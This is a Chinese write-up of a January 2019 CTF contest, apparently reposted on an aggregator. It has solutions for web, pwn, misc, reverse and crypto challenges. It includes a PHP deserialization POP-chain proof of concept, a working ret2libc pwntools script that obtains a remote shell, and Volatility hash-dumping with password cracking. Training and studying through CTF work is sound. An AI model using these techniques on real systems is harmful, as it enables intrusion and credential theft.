南天_SsMing
南天_SsMing

安恒月赛writeup 2019年1月

 

目录

web1

pwn2

misc1

misc2

reverse1

crypt1

新的一年,各位师傅太强了

web1

访问后看见源码

skyobj = new sec;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename;     
    public $nice;
    public $amzing; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  
  
class sec 
{  
    function read()     
    {          
        return "it's so sec~~";      
    }  
}  
if (isset($_GET['data']))  
{ 
    $Input_data = unserialize($_GET['data']);
    echo $Input_data; 
} 

?>

php 反序列化pop链构造,详细:http://www.cnblogs.com/iamstudy/articles/php_object_injection_pop_chain.html

sec中的read函数直接返回了一个字符串,但是cool类中的read函数执行了file_get_contents,baby虽然调用了sec类,但是通过寻找相同的函数名将类的属性和敏感函数的属性联系起来

利用脚本构造poc,来调用cool类中定义的read函数

skyobj = new cool;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename = "flag.php";     
    public $nice;
    public $amzing; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  
  

echo urlencode(serialize(new baby()));

?>

这里直接没有构造amazing,所以实例化的this->nice为空,后面的也就全都是空值,if条件里的判断也就绕过了

给data传参后,要查看网页源代码,得到flag

安恒月赛writeup 2019年1月_第1张图片

pwn2

checksec查看,只开启了NX保护

ida查看反汇编伪代码

安恒月赛writeup 2019年1月_第2张图片

发现read函数处有栈溢出漏洞,题目还给了libc文件

基本思路就是利用puts函数泄露puts的地址,然后根据偏移,计算出system的地址和/bin/sh的地址

直接上脚本

from pwn import *

sh = remote('101.71.29.5',10013)
libc = ELF('./libc-2.23.so')
elf = ELF('./rrr')

put_plt = elf.plt['puts']
put_got = elf.got['puts']
mainaddr = 0x08048662


payload = 52*'A'+p32(put_plt)+p32(mainaddr)+p32(put_got)
sh.sendline(payload)
sh.recvuntil('\n')
putsaddr = u32(sh.recv()[0:4])
print 'putsddress'+hex(putsaddr)
libcbase = putsaddr-libc.symbols['puts']


print '[leak system address]'
system_addr = putsaddr-0x24800
print '[leak binsh address]'
binsh_addr = putsaddr + 0xf9eeb
payload1 = 52*'A'+p32(system_addr)+p32(mainaddr)+p32(binsh_addr)
sh.sendline(payload1)
sh.interactive()

拿到shell

安恒月赛writeup 2019年1月_第3张图片

misc1

题目给了一张图片

安恒月赛writeup 2019年1月_第4张图片

用foremost分离出了另一张图,是个二维码

安恒月赛writeup 2019年1月_第5张图片

用stegsolve在图片的左下角找到了flag

安恒月赛writeup 2019年1月_第6张图片

misc2

内存镜像,找到管理员密码的明文,加MD5加密后,就是flag

volatility -f 文件名 imageinfo 知道镜像的基本信息,知道了该内存镜像的系统信息 winxpsp2x86

使用volatility,先列出注册表 使用volatility -f 文件名 --profile winxpsp2x86 hivelist

安恒月赛writeup 2019年1月_第7张图片

使用hashdump 得到镜像中各用户密码的hash值,volatility -f 文件名 --profile winxpsp2x86 hashdump -y system表的virtual地址 -s SAM表的virtual地址

使用ophcrack,选load中的single hash,破解出管理员的明文密码

安恒月赛writeup 2019年1月_第8张图片

123456789的md5值就是flag

安恒月赛writeup 2019年1月_第9张图片

reverse1

题目给出了一个python脚本编译成的exe,还有pyc文件,给出的pyc文件反编译不了

使用 pyinstxtractor.py脚本(下载地址:https://sourceforge.net/projects/pyinstallerextractor/)反编译题目给出的.exe文件

安恒月赛writeup 2019年1月_第10张图片

得到这一堆东西

安恒月赛writeup 2019年1月_第11张图片
 

用winhex打开图中的AnhengRe文件

 

安恒月赛writeup 2019年1月_第12张图片

用winhex打开题目原本给出的pyc文件

安恒月赛writeup 2019年1月_第13张图片

给AnhengRe文件添上pyc文件的文件头,然后加上后缀名 ,它就变成了一个pyc文件,再在线反编译一下(反编译地址:https://tool.lu/pyc/)

得到python源码

#!/usr/bin/env python
# encoding: utf-8
# 如果觉得不错,可以推荐给你的朋友!http://tool.lu/pyc
import os
n1 = input('Tell me your name?')
n2 = input('Tell me your pasw')
n11 = chr(ord(n1[0]) + 12)
s = ''
st3 = '51e'
st2 = '9f1ff1e8b5b91110'
st1 = 'c4e21c11a2412'
st0 = 'wrong'
if n11 + 'AnHeng' == n2:
    for i in range(0, 4):
        s += st1[3 - i]
    
    print('Congratulations')
    ts = st2[0] + st3 + st2[1] + s
    print('flag{' + st3[:1] + st1 + st2 + st3[-2:] + '}')
    os.system('pause')
else:
    print('no,' + st0)
import os
n1 = input('Tell me your name?')
n2 = input('Tell me your pasw')
n11 = chr(ord(n1[0]) + 12)
s = ''
st3 = '51e'
st2 = '9f1ff1e8b5b91110'
st1 = 'c4e21c11a2412'
st0 = 'wrong'
if n11 + 'AnHeng' == n2:
    for i in range(0, 4):
        s += st1[3 - i]
    
    print('Congratulations')
    ts = st2[0] + st3 + st2[1] + s
    print('flag{' + st3[:1] + st1 + st2 + st3[-2:] + '}')
    os.system('pause')
else:
    print('no,' + st0)

将多余代码都删除,直接输出flag

#!/usr/bin/env python
# encoding: utf-8
#!/usr/bin/env python
# encoding: utf-8

s = ''
st3 = '51e'
st2 = '9f1ff1e8b5b91110'
st1 = 'c4e21c11a2412'
st0 = 'wrong'
for i in range(0, 4):
    s += st1[3 - i]

print('Congratulations')
ts = st2[0] + st3 + st2[1] + s
print('flag{' + st3[:1] + st1 + st2 + st3[-2:] + '}')

crypt1

拿到一个字符串 ypau_kjg;"g;"ypau+

键盘之争,搞了半天是两种不同键盘的对照

安恒月赛writeup 2019年1月_第14张图片

结果是flag{this_is_flag}

你可能感兴趣的:(训练)

  • x86-64汇编语言训练程序与实战 十除以十等于一
    本文还有配套的精品资源,点击获取简介:汇编语言是一种低级语言,与机器代码紧密相关,特别适用于编写系统级代码及性能要求高的应用。nasm编译器是针对x86和x86-64架构的汇编语言编译器,支持多种语法风格和指令集。项目Euler提供数学和计算机科学问题,鼓励编程技巧应用,前100个问题的答案可共享。x86-64架构扩展了寄存器数量并引入新指令,提升了数据处理效率。学习汇编语言能够深入理解计算机底层
  • 日更006 终极训练营day3 懒cici
    人生创业课(2)今天的主题:学习方法一:遇到有用的书,反复读,然后结合自身实际,列践行清单,不要再写读书笔记思考这本书与我有什么关系,我在哪些地方能用到,之后我该怎么用方法二:读完书没映像怎么办?训练你的大脑,方法:每读完一遍书,立马合上书,做一场分享,几分钟都行对自己的学习要求太低,要逼自己方法三:学习深度不够怎么办?找到细分领域的榜样,把他们的文章、书籍、产品都体验一遍,成为他们的超级用户,向
  • 英伟达靠什么支撑起了4万亿?AI泡沫还能撑多久?
    英伟达市值突破4万亿美元,既是AI算力需求爆发的直接体现,也暗含市场对未来的狂热预期。其支撑逻辑与潜在风险并存,而AI泡沫的可持续性则取决于技术、商业与地缘政治的复杂博弈。⚙️一、英伟达4万亿市值的核心支撑因素技术垄断与生态壁垒硬件优势:英伟达GPU在AI训练市场占有率超87%,H100芯片的FP16算力达1979TFLOPS,领先竞品3-5倍。CUDA生态:400万开发者构建的软件护城河,成为A
  • 代码随想录算法训练营第三十五天
    01背包问题二维题目链接01背包问题二维题解importjava.util.Scanner;publicclassMain{publicstaticvoidmain(String[]args){Scannersc=newScanner(System.in);intM=sc.nextInt();intN=sc.nextInt();int[]space=newint[M];int[]value=new
  • D124:如何训练独立思考力? 大栗子_
    当我们要判断一个理论或者思想是否正确,需要有三个层次,分别是体验、解释和分析。首先看体验。很多时候,我们会相信“听上去、感觉是对的”的事情。我们之前讲的太空笔的故事之所以大多数人都认为是对的,就是有一些看似真实的关键词,比如美国,NASA,设计等,这些词看起来非常权威,但是离我们又遥远,这时候我们的大脑就会放松警惕了。于是,我们毫不犹豫就接受了。说到这里,你有没有发现之前的电视广告中的各种高让我们
  • 社交电商平台有哪些?社交电商怎么做? 氧惠评测
    社交电商平台有很多,以下是一些常见的社交电商平台:氧惠APP是与以往完全不同的抖客+淘客app!2024全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(训练营导师每天出单带货几万单)。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大礼包,教你如何1年做到百万团队。珊珊导师氧惠邀请码888999,注册送万元推广大礼包,教你如何1年做到百万团队。氧惠app:氧惠ap
  • AI模型训练中过拟合和欠拟合的区别是什么? workflower 人工智能算法人工智能数据分析
    在AI模型训练中,过拟合和欠拟合是两种常见的模型性能问题,核心区别在于模型对数据的学习程度和泛化能力:欠拟合(Underfitting)-定义:模型未能充分学习到数据中的规律,对训练数据的拟合程度较差,在训练集和测试集上的表现都不好(如准确率低、损失值高)。-原因:-模型结构过于简单(如用线性模型解决非线性问题);-训练数据量不足或特征信息不充分;-训练时间太短,模型尚未学到有效模式。-表现:训练
  • Anaconda 和 Miniconda:功能详解与选择建议 古月฿ python入门pythonconda
    Anaconda和Miniconda详细介绍一、Anaconda的详细介绍1.什么是Anaconda?Anaconda是一个开源的包管理和环境管理工具,在数据科学、机器学习以及科学计算领域发挥着关键作用。它以Python和R语言为基础,为用户精心准备了大量预装库和工具,极大地缩短了搭建数据科学环境的时间。对于那些想要快速开展数据分析、模型训练等工作的人员来说,Anaconda就像是一个一站式的“数
  • 魔搭平台实战:手把手教你训练SDXL模型,解锁AI绘画新纪元 Liudef06小白 特殊专栏AIGC人工智能AI作画人工智能AIGC
    魔搭平台实战:手把手教你训练SDXL模型,解锁AI绘画新纪元随着多模态AI技术的爆发式发展,StableDiffusionXL(SDXL)等文生图模型正在彻底重塑创意产业工作流。本文将深入解析如何在魔搭平台高效训练SDXL模型,并探讨AI绘画技术对设计行业的革命性影响。一、SDXL模型架构解析1.1双文本编码器设计SDXL采用双文本编码器架构,显著提升提示词理解能力:#SDXL文本编码器结构示意c
  • D13-0729-阿凡提 阿凡提在冰川
    D13D13-0729-阿凡提如何避开听力训练中的常见坑——Zoe分享听力训练中的常见坑听力训练中的常见坑看不懂,写不出:生词障碍,背景知识能看看懂,写不出:口音、语音现象(连读、弱读、爆破等)、语法一些语音现象失去爆破:两个爆破音连在一起,前面的失去爆破击穿:辅音、爆破音后面接h一般不发音,Youkown听力练习最大的坑听完不复习表现::听完不对材料进行复习,仅仅对一些错词进行更正,不做进一步拓
  • 【大模型微调实战】4. P-Tuning爆款文案生成:让模型学会小红书“爽感”写作,转化率提升300% AI_DL_CODE 大模型微调P-Tuning小红书文案爆款生成情绪强化自然语言生成提示工程
    摘要:在内容营销竞争白热化的当下,普通文案已难以突破流量壁垒。本文聚焦P-Tuning技术在小红书爆款文案生成中的落地应用,通过参数化提示向量优化,将抽象的“爽感”写作转化为可量化、可训练的技术指标。文中提出“六步成文法”,从情绪化数据集构建到爆款元素复刻,完整拆解如何用RTX3060级显卡实现0.1%参数量微调,使文案点击率从2.1%提升至8.7%,爆文率提高5倍,单条文案带货超8万元。核心创新
  • 2018年中南大学中英翻译 某翁
    参考:20180827235856533.jpg【1】机器学习理论表明,机器学习算法能从有限个训练集样本上得到较好的泛化【1】Machinelearningtheoryshowsthatmachinelearningalgorithmcangeneralizewellfromfinitetrainingsetsampleslimited有限的infinite无限的【2】这似乎违背了一些基本的逻辑准
  • 如何运用深度学习打造高效AI人工智能系统 AI智能探索者 AIAgent智能体开发实战人工智能深度学习ai
    如何运用深度学习打造高效AI人工智能系统关键词:深度学习、AI系统、神经网络、模型优化、实战开发摘要:本文将从深度学习的核心概念出发,结合生活实例和代码实战,系统讲解如何构建高效AI系统。我们会拆解数据准备、模型设计、训练优化、部署落地的全流程,揭秘“数据-模型-训练-推理”的协同机制,并通过具体案例演示从0到1开发AI系统的关键技巧,帮助开发者掌握打造高效AI系统的底层逻辑。背景介绍目的和范围在
  • 李汶翰、徐娇领衔主演,杭州2022年亚运组委会授权电视剧《泳往直前》阵容官宣! 楚离杜子腾
    今日,杭州亚组委授权电视剧《泳往直前》阵容官宣,由黄克敏执导,李汶翰、徐娇领衔主演。《泳往直前》是亚运会筹备工作启动以来,着手谋划创作的亚运主题文艺精品项目之一,也是杭州亚组委官方授权拍摄的唯一一部亚运主题电视剧。《泳往直前》主要讲述了四名背景各异,独具个性的少年在泳池奋力拼搏、执着追梦的故事。中年失意的游泳教练梁友光,为了证明自己的能力,四处挖掘游泳的好苗子冲刺亚运会,在发现了毫无训练经验却颇有
  • 零数学基础理解AI核心概念:梯度下降可视化实战 九章云极AladdinEdu 人工智能gpu算力深度学习pytorchpython语言模型opencv
    点击“AladdinEdu,同学们用得起的【H卡】算力平台”,H卡级别算力,按量计费,灵活弹性,顶级配置,学生专属优惠。用Python动画演示损失函数优化过程,数学公式具象化读者收获:直观理解模型训练本质,破除"数学恐惧症"当盲人登山者摸索下山路径时,他本能地运用了梯度下降算法。本文将用动态可视化技术,让你像感受重力一样理解AI训练的核心原理——无需任何数学公式推导。一、梯度下降:AI世界的"万有
  • 电影优惠券在哪里领?电影优惠券领取渠道分享 高省爱氧惠
    对于电影爱好者来说,能够用更优惠的价格观看心仪的电影无疑是一种享受。那么,如何获取电影优惠券呢?今天,我们就来分享一些电影优惠券的领取渠道,帮助你在观影时更加省钱!氧惠APP是与以往完全不同的抖客+淘客app!2024全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(训练营导师每天出单带货几万单)。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大礼包,教你如何1年
  • 2023-06-14 幸福心理学
    焦点日记分享第3天在焦点如此独特的基本精神之下,焦点历程中存有与一般咨询晤谈共通的基本技巧,常是较少被着墨与强调的,甚至有些咨询师还会以为焦点并没有基本的咨询技巧。然而,缺少基本的咨询技巧训练,咨询师其实难以将焦点顺利推进。
  • 淘宝购物哪里可以领优惠券?什么地方可以领淘宝优惠券? 氧惠评测
    在淘宝购物,可以通过以下几种方式领取优惠券:氧惠APP是与以往完全不同的抖客+淘客app!2024全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(训练营导师每天出单带货几万单)。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大礼包,教你如何1年做到百万团队。珊珊导师氧惠邀请码888999,注册送万元推广大礼包,教你如何1年做到百万团队。在淘宝网站或APP的“领券
  • 从零开始构建深度学习环境:基于Pytorch、CUDA与cuDNN的虚拟环境搭建与实践(适合初学者) 荣华富贵8 程序员的知识储备2程序员的知识储备3深度学习pytorch人工智能
    摘要:深度学习正在引领人工智能技术的革新,而对于初学者来说,正确搭建深度学习环境是迈向AI研究与应用的第一步。本文将为读者提供一套详尽的教程,指导如何在本地环境中搭建Pytorch、CUDA与cuDNN,以及如何利用Anaconda和PyCharm进行高效开发。内容涵盖从环境配置、常见错误修正,到基础的深度学习模型构建及训练。我们旨在为深度学习零基础的入门者提供一个全面且易于理解的“保姆级”教程,
  • BEYOND BINARY REWARDS: TRAINING LMS TOREASON ABOUT THEIR UNCERTAINTY 樱花的浪漫 大模型与智能体对抗生成网络与动作识别强化学习人工智能语言模型自然语言处理机器学习深度学习
    https://gist.github.com/josherich/8a30dbf3d6ae0cae1048c3331f38fe80https://gist.github.com/josherich/8a30dbf3d6ae0cae1048c3331f38fe801引言与此担忧一致,研究表明,即使最初校准良好的大型语言模型(LLMs)在RL训练后也会变得过度自信(Lengetal.,2
  • 苏轼(九) 豆宝儿读书
    在苏轼那里,从来没有过"历史不容假设"这种教条,相反,历史就是拿来假设的:假设在某个历史场景下,当事人没有采用甲方案,而是采用乙方案,结果会有什么不同?这种策略性思维训练正是纵横家的经典风格,重视的是对策略的优化,以达成最优结果为导向。你大概也知道,苏轼很爱读历史,但他并不想当历史学家,而是不断给古人复盘,在古人的经验教训里模拟自己的人生。从这个角度上看,苏轼在20岁的时候就已经体验了几千年、几千
  • 纸上得来终觉浅,绝知此事要躬行 三素棋科技
    感谢大冶黄狮海小学安排的时间,我们上周五去学校给孩子们集中组织了三人一组的三素棋训练。孩子们都非常兴奋。看到一张张青春洋溢的笑脸,再次感觉校园生活真美好。希望孩子们都可以好好学习,天天向上。与孩子们交流过程中,有的孩子说在家跟自己的爸爸妈妈,爷爷奶奶下棋,也有的教自己的弟弟妹妹下棋,有的反映下不过自己的爷爷,说爷爷听了一遍规则就会了,算术太厉害啦。说明孩子们在家还是有练习的,孰能生巧,相信口算一定
  • 7月14日暑期周记 小溪流苇
    这个星期我开始参加了篮球训练营,我又找回了曾经与篮球的那种默契又走上了打球的巅峰。训练营里,各个年龄段的都有,水平参差不齐。有的是一年级的,有的和我同龄,还有的是初中,甚至是高中生。篮球训练,刚开始就是练习投篮、三步上篮、行进间运球等等。有时候教练也会破例让我们打一场比赛。篮球训练,结束后,就回家开始写数学作业,中午练习吉他和双排键下午完成英语和语文,晚上出去玩儿,周六我提前写完作业,下午和爸爸去
  • 大学英语四级作文押题预测与备考指南
    一、四级作文出题规律回顾在探讨押题之前,先来回顾一下四级作文的出题规律。通过对历年真题的分析,我们可以发现以下特点:聚焦校园生活:如健康生活方式(2022年12月)、课外活动的丰富(2022年6月)、新生训练(2021年12月)等,这些话题紧密围绕大学生的日常学习与生活。强调实用能力:涉及社交技能(2022年12月)、演讲能力(2021年12月)、技术使用(如PPT在课堂中的使用,2020年9月)
  • 张伟采访笔录——把自己喜欢的留在身边丨2021年3月第3周小结 丨张伟丨
    中篇故事丨文/张伟乐之写作工作坊这是椰子私塾第1511篇原创输出我2021年的关键词——闲。读些闲书,写点闲文;鸟归巢,鱼潜渊,如此而已。1、读闲书。《悲惨世界》75%《人类群星闪耀时》82%《微信互联网平民创业》43%《关于陀思妥耶夫斯基的六次讲座》59%《写作训练课:轻松写出好文章》16%2、日更,写闲文。接上周。国际红透天著名主持人三三一:我这样理解,你看看对不对,你刚才提到的减重经历是一个
  • 【调试Bug】网络在训练中输出NaN
    首先情况是开始训练正常,网络也在更新,更新后网络就输出了NaN。调试过程:1.查看模型权重更新前后的值print("更新前权重信息:")print(f"权重均值:{fc2.weight.mean().item()ifnottorch.isnan(fc2.weight.mean())else'NaN'}")print(f"最大值:{fc2.weight.max().item()ifnottorch.
  • 【无戒学堂】拨开写书评的迷雾—90天写作成长营第十课 淼淼小姑娘
    今天是我参加无戒学堂90天写作训练营的第32天。这一天我终于盼来了关于如何写书评的课程。在这一节课之前,我对书评的概念是模糊的。我经常看到写一篇书评可以获得几百甚至几千元的稿酬,并且网络上总是宣传书评很容易写。这是真的吗?我很好奇。于是我去查阅很多资料,但是我所查阅的资料中,对书评是怎么写的没有具体的说法。今天的这节课,土豆白老师告诉我,书评指的是对一本书的评价和介绍。对于书评的写作,没有固定的形
  • Lily的Scalers Talk第八轮新概念朗读持续力训练Day219 2023-07-05 草木Lily
    Lesson13-2ThesearchforoilThegeologistneedstoknowwhatrocksthedrillhasreached,soeverysooftenasampleisobtainedwithacoringbit.Itcutsacleancylinderofrock,fromwhichcanbeseenthestratathedrillhasbeencuttingth
  • 沿瑾+教练春哥+第三拆作业 sunny0902
    拆书帮长沙橘洲分舵第10期训练营第三拆作业~2020.03.18选自《亲密关系》P163-164【R•阅读原文片段】在沟通中当我们接收到他人的信息时,有两个重要的任务要完成。第一是要准确的理解对方话语所表达的意思,第二是要向对方传达关注和理解,让他知道我们对他的话是在意的。这两个任务都可以通过复述(paraphrasing)接受到的信息而完成。即用自己的话重复对方的意思,让信息传递着有机会肯定那就
  • 101|一个有仪式感的开营仪式需要具备哪些元素? 猴儿快跑
    我加入的内容优质的社群也不少了,比如剽悍系列、鱼苗系列、老高的训练营等等。抛开内容不说,让我在运营上最震撼的,还是当初的剽悍行动营。结合分享,我说说我个人的一些想法,我个人觉得有三个阶段。一、前期准备我个人觉得,前期的宣传、用户筛选和预备期,是对开营有很大影响的,我一一说来。1、宣传/故事宣传的载体一般是故事,因为故事最深入人心,我拿几个典型社群来分析。剽悍行动营——剽悍一只猫(猫叔)通过读书和极
  • 用MiddleGenIDE工具生成hibernate的POJO(根据数据表生成POJO类) AdyZhang POJOeclipseHibernateMiddleGenIDE
    推荐:MiddlegenIDE插件,   是一个Eclipse   插件.     用它可以直接连接到数据库,   根据表按照一定的HIBERNATE规则作出BEAN和对应的XML ,用完后你可以手动删除它加载的JAR包和XML文件!     今天开始试着使用
  • .9.png Cb123456 android
      “点九”是andriod平台的应用软件开发里的一种特殊的图片形式,文件扩展名为:.9.png   智能手机中有自动横屏的功能,同一幅界面会在随着手机(或平板电脑)中的方向传感器的参数不同而改变显示的方向,在界面改变方向后,界面上的图形会因为长宽的变化而产生拉伸,造成图形的失真变形。   我们都知道android平台有多种不同的分辨率,很多控件的切图文件在被放大拉伸后,边
  • 算法的效率 天子之骄 算法效率复杂度最坏情况运行时间大O阶平均情况运行时间
    算法的效率 效率是速度和空间消耗的度量。集中考虑程序的速度,也称运行时间或执行时间,用复杂度的阶(O)这一标准来衡量。空间的消耗或需求也可以用大O表示,而且它总是小于或等于时间需求。   以下是我的学习笔记:   1.求值与霍纳法则,即为秦九韶公式。   2.测定运行时间的最可靠方法是计数对运行时间有贡献的基本操作的执行次数。运行时间与这个计数成正比。
  • java数据结构 何必如此 java数据结构
    Java 数据结构 Java工具包提供了强大的数据结构。在Java中的数据结构主要包括以下几种接口和类: 枚举(Enumeration) 位集合(BitSet) 向量(Vector) 栈(Stack) 字典(Dictionary) 哈希表(Hashtable) 属性(Properties) 以上这些类是传统遗留的,在Java2中引入了一种新的框架-集合框架(Collect
  • MybatisHelloWorld 3213213333332132
    //测试入口TestMyBatis package com.base.helloworld.test; import java.io.IOException; import org.apache.ibatis.io.Resources; import org.apache.ibatis.session.SqlSession; import org.apache.ibat
  • Java|urlrewrite|URL重写|多个参数 7454103 javaxmlWeb工作
     个人工作经验! 如有不当之处,敬请指点 1.0  web -info 目录下建立     urlrewrite.xml  文件 类似如下: <?xml version="1.0" encoding="UTF-8" ?>   <!DOCTYPE u
  • 达梦数据库+ibatis darkranger sqlmysqlibatisSQL Server
    --插入数据方面 如果您需要数据库自增... 那么在插入的时候不需要指定自增列. 如果想自己指定ID列的值, 那么要设置 set identity_insert  数据库名.模式名.表名; ----然后插入数据; example: create table zhabei.test( id bigint identity(1,1) primary key, nam
  • XML 解析 四种方式 aijuans android
    XML现在已经成为一种通用的数据交换格式,平台的无关性使得很多场合都需要用到XML。本文将详细介绍用Java解析XML的四种方法。 XML现在已经成为一种通用的数据交换格式,它的平台无关性,语言无关性,系统无关性,给数据集成与交互带来了极大的方便。对于XML本身的语法知识与技术细节,需要阅读相关的技术文献,这里面包括的内容有DOM(Document Object
  • spring中配置文件占位符的使用 avords
    1.类 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.o
  • 前端工程化-公共模块的依赖和常用的工作流 bee1314 webpack
    题记: 一个人的项目,还有工程化的问题嘛?   我们在推进模块化和组件化的过程中,肯定会不断的沉淀出我们项目的模块和组件。对于这些沉淀出的模块和组件怎么管理?另外怎么依赖也是个问题? 你真的想这样嘛?   var BreadCrumb = require(‘../../../../uikit/breadcrumb’); //真心ugly。  
  • 上司说「看你每天准时下班就知道你工作量不饱和」,该如何回应? bijian1013 项目管理沟通IT职业规划
    问题:上司说「看你每天准时下班就知道你工作量不饱和」,如何回应         正常下班时间6点,只要是6点半前下班的,上司都认为没有加班。   Eno-Bea回答,注重感受,不一定是别人的         虽然我不知道你具体从事什么工作与职业,但是我大概猜测,你是从事一项不太容易出现阶段性成果的工作
  • TortoiseSVN,过滤文件 征客丶 SVN
    环境: TortoiseSVN 1.8 配置: 在文件夹空白处右键 选择  TortoiseSVN -> Settings 在 Global ignote pattern 中添加要过滤的文件: 多类型用英文空格分开 *name : 过滤所有名称为 name 的文件或文件夹 *.name : 过滤所有后缀为 name 的文件或文件夹 --------
  • 【Flume二】HDFS sink细说 bit1129 Flume
    1. Flume配置   a1.sources=r1 a1.channels=c1 a1.sinks=k1 ###Flume负责启动44444端口 a1.sources.r1.type=avro a1.sources.r1.bind=0.0.0.0 a1.sources.r1.port=44444 a1.sources.r1.chan
  • The Eight Myths of Erlang Performance bookjovi erlang
    erlang有一篇guide很有意思: http://www.erlang.org/doc/efficiency_guide 里面有个The Eight Myths of Erlang Performance: http://www.erlang.org/doc/efficiency_guide/myths.html   Myth: Funs are sl
  • java多线程网络传输文件(非同步)-2008-08-17 ljy325 java多线程socket
    利用 Socket 套接字进行面向连接通信的编程。客户端读取本地文件并发送;服务器接收文件并保存到本地文件系统中。 使用说明:请将TransferClient, TransferServer, TempFile三个类编译,他们的类包是FileServer. 客户端: 修改TransferClient: serPort, serIP, filePath, blockNum,的值来符合您机器的系
  • 读《研磨设计模式》-代码笔记-模板方法模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.ResultSet;
  • 配置心得 chenyu19891124 配置
    时间就这样不知不觉的走过了一个春夏秋冬,转眼间来公司已经一年了,感觉时间过的很快,时间老人总是这样不停走,从来没停歇过。 作为一名新手的配置管理员,刚开始真的是对配置管理是一点不懂,就只听说咱们公司配置主要是负责升级,而具体该怎么做却一点都不了解。经过老员工的一点点讲解,慢慢的对配置有了初步了解,对自己所在的岗位也慢慢的了解。 做了一年的配置管理给自总结下: 1.改变 从一个以前对配置毫无
  • 对“带条件选择的并行汇聚路由问题”的再思考 comsci 算法工作软件测试嵌入式领域模型
    2008年上半年,我在设计并开发基于”JWFD流程系统“的商业化改进型引擎的时候,由于采用了新的嵌入式公式模块而导致出现“带条件选择的并行汇聚路由问题”(请参考2009-02-27博文),当时对这个问题的解决办法是采用基于拓扑结构的处理思想,对汇聚点的实际前驱分支节点通过算法预测出来,然后进行处理,简单的说就是找到造成这个汇聚模型的分支起点,对这个起始分支节点实际走的路径数进行计算,然后把这个实际
  • Oracle 10g 的clusterware 32位 下载地址 daizj oracle
    Oracle 10g 的clusterware 32位 下载地址 http://pan.baidu.com/share/link?shareid=531580&uk=421021908 http://pan.baidu.com/share/link?shareid=137223&uk=321552738 http://pan.baidu.com/share/l
  • 非常好的介绍:Linux定时执行工具cron dongwei_6688 linux
    Linux经过十多年的发展,很多用户都很了解Linux了,这里介绍一下Linux下cron的理解,和大家讨论讨论。cron是一个Linux 定时执行工具,可以在无需人工干预的情况下运行作业,本文档不讲cron实现原理,主要讲一下Linux定时执行工具cron的具体使用及简单介绍。 新增调度任务推荐使用crontab -e命令添加自定义的任务(编辑的是/var/spool/cron下对应用户的cr
  • Yii assets目录生成及修改 dcj3sjt126com yii
    assets的作用是方便模块化,插件化的,一般来说出于安全原因不允许通过url访问protected下面的文件,但是我们又希望将module单独出来,所以需要使用发布,即将一个目录下的文件复制一份到assets下面方便通过url访问。 assets设置对应的方法位置 \framework\web\CAssetManager.php   assets配置方法 在m
  • mac工作软件推荐 dcj3sjt126com mac
    mac上的Terminal + bash + screen组合现在已经非常好用了,但是还是经不起iterm+zsh+tmux的冲击。在同事的强烈推荐下,趁着升级mac系统的机会,顺便也切换到iterm+zsh+tmux的环境下了。 我为什么要要iterm2 切换过来也是脑袋一热的冲动,我也调查过一些资料,看了下iterm的一些优点: * 兼容性好,远程服务器 vi 什么的低版本能很好兼
  • Memcached(三)、封装Memcached和Ehcache frank1234 memcachedehcachespring ioc
    本文对Ehcache和Memcached进行了简单的封装,这样对于客户端程序无需了解ehcache和memcached的差异,仅需要配置缓存的Provider类就可以在二者之间进行切换,Provider实现类通过Spring IoC注入。 cache.xml <?xml version="1.0" encoding="UTF-8"?>
  • Remove Duplicates from Sorted List II hcx2013 remove
    Given a sorted linked list, delete all nodes that have duplicate numbers, leaving only distinct numbers from the original list. For example,Given 1->2->3->3->4->4->5,
  • Spring4新特性——注解、脚本、任务、MVC等其他特性改进 jinnianshilongnian spring4
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • MySQL安装文档 liyong0802 mysql
      工作中用到的MySQL可能安装在两种操作系统中,即Windows系统和Linux系统。以Linux系统中情况居多。   安装在Windows系统时与其它Windows应用程序相同按照安装向导一直下一步就即,这里就不具体介绍,本文档只介绍Linux系统下MySQL的安装步骤。   Linux系统下安装MySQL分为三种:RPM包安装、二进制包安装和源码包安装。二
  • 使用VS2010构建HotSpot工程 p2p2500 HotSpotOpenJDKVS2010
    1. 下载OpenJDK7的源码:      http://download.java.net/openjdk/jdk7      http://download.java.net/openjdk/      2. 环境配置     ▶
  • Oracle实用功能之分组后列合并 seandeng888 oracle分组实用功能合并
    1       实例解析 由于业务需求需要对表中的数据进行分组后进行合并的处理,鉴于Oracle10g没有现成的函数实现该功能,且该功能如若用JAVA代码实现会比较复杂,因此,特将SQL语言的实现方式分享出来,希望对大家有所帮助。如下: 表test 数据如下: ID,SUBJECTCODE,DIMCODE,VALUE 1&nbs
  • Java定时任务注解方式实现 tuoni javaspringjvmxmljni
    Spring 注解的定时任务,有如下两种方式: 第一种: <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans"  xmlns:xsi="http
